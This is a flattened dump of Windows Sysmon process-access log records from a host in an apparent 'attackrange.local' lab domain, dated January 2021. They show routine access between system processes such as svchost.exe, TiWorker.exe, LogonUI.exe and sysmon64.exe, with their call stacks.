13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 